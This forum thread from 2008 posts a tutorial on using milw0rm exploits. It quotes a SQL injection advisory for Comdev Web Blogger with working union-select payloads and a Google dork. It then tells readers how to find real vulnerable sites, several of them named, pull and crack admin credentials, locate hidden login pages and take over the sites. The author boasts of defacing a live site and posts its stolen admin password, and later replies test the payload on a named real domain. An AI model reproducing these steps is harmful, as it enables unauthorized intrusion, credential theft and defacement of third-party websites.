1. We have moved from vBulletin to XenForo and you are viewing the site in the middle of the move. Though the functional aspect of everything is working fine, we are still working on other changes including the new design on Xenforo.
    Dismiss Notice

How to use Milw0rm.com

Discussion in 'Ethical hacking Tips' started by XXxxImmortalxxXX, Jul 18, 2008.

Tags:
  1. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    Joined:
    Jun 27, 2007
    Messages:
    569
    Likes Received:
    18
    Trophy Points:
    0
    Hello guys i see people always asking me how to use milw0rm.com so i figured i will show you all.

    Today we are going to learn the web applications part of milw0rm.com

    So

    lets go to Milw0rm shall we

    Now go to web applications and you see a whole lot of stuff right were gonna look for sql injection vulnerability.

    We found this okay right here

    And it shows you the following

    Code:
    ____________________   ___ ___ ________
    \_   _____/\_   ___ \ /   |   \\_____  \  
     |    __)_ /    \  \//    ~    \/   |   \ 
     |        \\     \___\    Y    /    |    \
    /_______  / \______  /\___|_  /\_______  /
            \/         \/       \/         \/ 
    
                                            .OR.ID
    ECHO_ADV_100$2008
    
    -----------------------------------------------------------------------------------------
    [ECHO_ADV_100$2008] Comdev Web Blogger <= 4.1.3 (arcmonth) Sql Injection Vulnerability
    -----------------------------------------------------------------------------------------
    
    Author       : M.Hasran Addahroni
    Date         : July, 14 th 2008
    Location     : Jakarta, Indonesia
    Web          : [url]http://e-rdc.org/v1/news.php?readmore=102[/url]
    Critical Lvl : Medium
    Impact       : System access
    Where        : From Remote
    ---------------------------------------------------------------------------
    
    Affected software description:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    Application : Comdev Web Blogger
    version     : <= 4.1.3
    Vendor      : [url]http://www.comdevweb.com/blogger.php[/url]
    Description :
    
    Comdev Web Blogger is your voice and also allows others to give you feedback on a post-by-post basis.
    Site members can now create, manage, upload photos to their own blogs.FEATURES: Non Template-Based Gives You Flexibility to Fit
    the Web Blogger to Your Web Design Page • Multiple user accounts to create & invite friends to their own blogs • Hot Blogs, 
    Latest Blogs • RSS News Feeds • Blogs Categorisation • Hot Blogs & Latest Blogs • Search Blogs • Mini Calendar • Monthly Archive•
    Links to Friends' Blog • Public or Friends View Only Blogs • Set Post Comments Permission • Friends Login • Forms Submission with 
    CAPTCHA Image Verification • WYSIWYG Editor for Blog & Comment • Notify Friends of New Blog • Set View & Post Comment Permissions •
    sSet Date & Time Format • Local Time Zone • Pre-defined Front-end CSS • Personalized Emails & Auto-Responders • 
    Installation Support available
    
    ---------------------------------------------------------------------------
    
    Vulnerability:
    ~~~~~~~~~~~~~
    
    Input passed to the "arcmonth" parameter in blog's page is not properly verified before being used 
    in an sql query.
    This can be exploited thru the browser to manipulate SQL queries and pull the username and password
    from admin and users in plain text. Successful exploitation requires that "magic_quotes" is off.
    
    
    Poc/Exploit:
    ~~~~~~~~~
    
    [url]http://www.example.com/[/url][path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-1%20union%20select%201,concat(username,0x3a,password),3,4,5,6%20from%20sys_user--
    [url]http://www.example.com/[/url][path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-11%20union%20select%201,username,3,password,5,6%20from%20sys_user/*
    
    Admin Login at [url]http://www.example.com/[/url][PATH]/oneadmin/
    
    Dork:
    ~~~~
    Google : "Powered by Comdev Web Blogger" or allinurl:".php?domain= arcyear=2007 arcmonth"
    
    
    Solution:
    ~~~~~~
    
    - Edit the source code to ensure that input is properly verified.
    - Turn on magic_quotes in php.ini
    
    
    Timeline:
    ~~~~~~~~
    
    - 11 - 07 - 2008 bug found
    - 11 - 07 - 2008 vendor contacted
    - 14 - 07 - 2008 advisory released
    ---------------------------------------------------------------------------
    
    Shoutz:
    ~~~~
    ~ ping - my dearest wife "happy birthday darling", zautha - my beloved son
    ~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,negative,
    the_hydra,neng chika, str0ke
    ~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOCIATES
    ~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,
    super_temon, b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
    ~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R,
    kuntua, stev_manado,nofry,k1tk4t,0pt1c
    ~ [email]newbie_hacker@yahoogroups.com[/email]
    ~ #aikmel #e-c-h-o @irc.dal.net
    
    ---------------------------------------------------------------------------
    Contact:
    ~~~~~
    
    K-159 || echo|staff || eufrato[at]gmail[dot]com
    Homepage: [url]http://www.e-rdc.org/[/url]
    
    -------------------------------- [ EOF ] ---------------------------------- 
    
    # milw0rm.com [2008-07-15]
    
    now look at

    Code:
    http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-1%20union%20select%201,concat(username,0x3a,password),3,4,5,6%20from%20sys_user--
    http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-11%20union%20select%201,username,3,password,5,6%20from%20sys_user/*
    
    This is the sql injection into the site there are 2 separate ones and under that is the DORK:

    Code:
    Powered by Comdev Web Blogger" or allinurl:".php?domain= arcyear=2007 arcmonth
    The dork is what you are going to type in google or whatever search engine you want and the search engine will give you a list of websites that power by that so go into your search engine and paste that or type

    Code:
    allinurl:".php?domain= arcyear=2007 arcmonth
    So you see a whole bunch of websites right and your looking for the dork so the website listed are below

    www.manilatimes.net.ph/index.php?domain=&arcyear=2007&arcmonth=6

    www.ravendrumfoundation.org/whatsnew.php?domain=&arcyear=2007&arcmonth=9

    www.shiptalkforum.com/index.php?domain=&arcyear=2007&arcmonth=5

    And if you remember the dork you was looking for the .php?domain=&arcyear=2007&acrmonth=6

    So you got all the sites that google provided so look for any site that has the dork and click it now once you are at that site get the sql injection code and paste it in the url where it says arcmonth=6 paste it after the = remember to delete the 6 tho so it will look like this

    http://wealthbeing.co.uk/blog.php?d...ername,0x3a,password),3,4,5,6 from sys_user--

    We hit enter and u see the admin username and password along with other users as well that password is encrypted so user john the ripper or cain and abel to decrypt it and then you will have to find the admin login page i would 1. go through every link right click view source and look for a admin login page if its not there get the cracked version of acuntix and scan that website and it will show you the admin page then you can just login and do whatever you want below is a site that i did on a demonstration and lets go to the following site

    HACKED BY XXxxImmortalxxXX

    Now what i did was sql inject the site and it gave me the following

    admin::imagert26

    Which was the usernamd and password and I dunno why it wasnt encrypted anyways it said look for /oneadmin well oneadmin wasnt there

    So then we go through every link looking at the source code looking for a login page didnt find one my last step was to scan the site with all of its links

    I did and i got

    /cms/index.php?

    which was the login i think they tryed to hide it lol

    so we then login and do what ever we want hope this tut helps
     
    Last edited by a moderator: Jul 18, 2008
  2. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,276
    Likes Received:
    364
    Trophy Points:
    83
    Hey I was able to open that URL now and gr8 job. I hope you notified the users before putting that up there.

    Also remember Content Copyright of Users everything else Copyright © Go4Expert.com, 2004 - 2008.
     
  3. P455w0rd_Cr4kz

    P455w0rd_Cr4kz New Member

    Joined:
    Jan 12, 2007
    Messages:
    199
    Likes Received:
    12
    Trophy Points:
    0
    Location:
    H3LL
    Home Page:
    Hello Shabbir, I sent xximmortalxx a simple search string for google that will give you lots and lots of phMyAdmin without passwords,amazing how careless people can be sometimes.
     
  4. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,276
    Likes Received:
    364
    Trophy Points:
    83
    Why not give to me as well?
     
  5. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    Joined:
    Jun 27, 2007
    Messages:
    569
    Likes Received:
    18
    Trophy Points:
    0
  6. evilone

    evilone New Member

    Joined:
    Jul 29, 2008
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    0
    Good share, until i see this pots i dont have idea how can i use the exploits provided in milw0rm....Now let make my trials and get some knowledge on using this stuff....thanks for sharing
     
  7. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    Joined:
    Jun 27, 2007
    Messages:
    569
    Likes Received:
    18
    Trophy Points:
    0
    No problem mate
     
  8. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    Joined:
    Jun 27, 2007
    Messages:
    569
    Likes Received:
    18
    Trophy Points:
    0
    LoL faggits posted this tutorial on there site without giving me any credidation lol

    h*tp://www.is-sw.net/vb/showthread.php?t=5617
     
    Last edited by a moderator: Oct 2, 2008
  9. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,276
    Likes Received:
    364
    Trophy Points:
    83
    Register there and post a link to your this one. Admin may look at it.

    Also I edited your link so that its unclickable
     
  10. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    Joined:
    Jun 27, 2007
    Messages:
    569
    Likes Received:
    18
    Trophy Points:
    0
    i did register and u want me to post a link on there site ? to this one?
     
  11. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,276
    Likes Received:
    364
    Trophy Points:
    83
    Not exactly. Claim it to be your article and the guy has copied and to prove that you have the original you may want to show him the date here.
     
  12. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    Joined:
    Jun 27, 2007
    Messages:
    569
    Likes Received:
    18
    Trophy Points:
    0
    OHH MY GOD this guys sayed HE MADE THIS TUTORIAL AND WHERE IT SAYS

    ht*p://casihacks.info/index.php?showtopic=476&st=0&gopid=1220&#entry1220


    U MUST REGISTER

    HACKED BY Casi (ht*p://www.tertuliamagazine.com/) Old tutorial,the site is now running again!


    look in my tutorial it says that i hacked it OHH MY GOD THIS IS PISSSING ME off when they still this crap
     
    Last edited by a moderator: Oct 17, 2008
  13. indiansword

    indiansword Security Expert

    Joined:
    Oct 19, 2008
    Messages:
    496
    Likes Received:
    36
    Trophy Points:
    0
    Occupation:
    Operation Planner for 3 Australia
    Home Page:
    i really dont think this is working becoz i tried this

    Code:
     iexplore http://wealthbeing.co.uk/blog.php?domain=&arcyear=2007&arcmonth=-1%20union%20select%201,concat(username,0x3a,passwo rd),3,4,5,6%20from%20sys_user-- 
    but it doesnt do anything,

    it just brings up the normal website

    neither i understood what to put in the search .
     
  14. indiansword

    indiansword Security Expert

    Joined:
    Oct 19, 2008
    Messages:
    496
    Likes Received:
    36
    Trophy Points:
    0
    Occupation:
    Operation Planner for 3 Australia
    Home Page:
    no answer?
     
  15. XXxxImmortalxxXX

    XXxxImmortalxxXX New Member

    Joined:
    Jun 27, 2007
    Messages:
    569
    Likes Received:
    18
    Trophy Points:
    0
    that site has probably been updated try another
     
  16. indiansword

    indiansword Security Expert

    Joined:
    Oct 19, 2008
    Messages:
    496
    Likes Received:
    36
    Trophy Points:
    0
    Occupation:
    Operation Planner for 3 Australia
    Home Page:
    that what i aint sure... WHICH sites to test,.... if u search in google 0 results :|
     
  17. jose133t

    jose133t New Member

    Joined:
    Jun 24, 2011
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    0
    Occupation:
    Keying the Laptop
    Location:
    Earth
    Home Page:
    :cryin:
     

Share This Page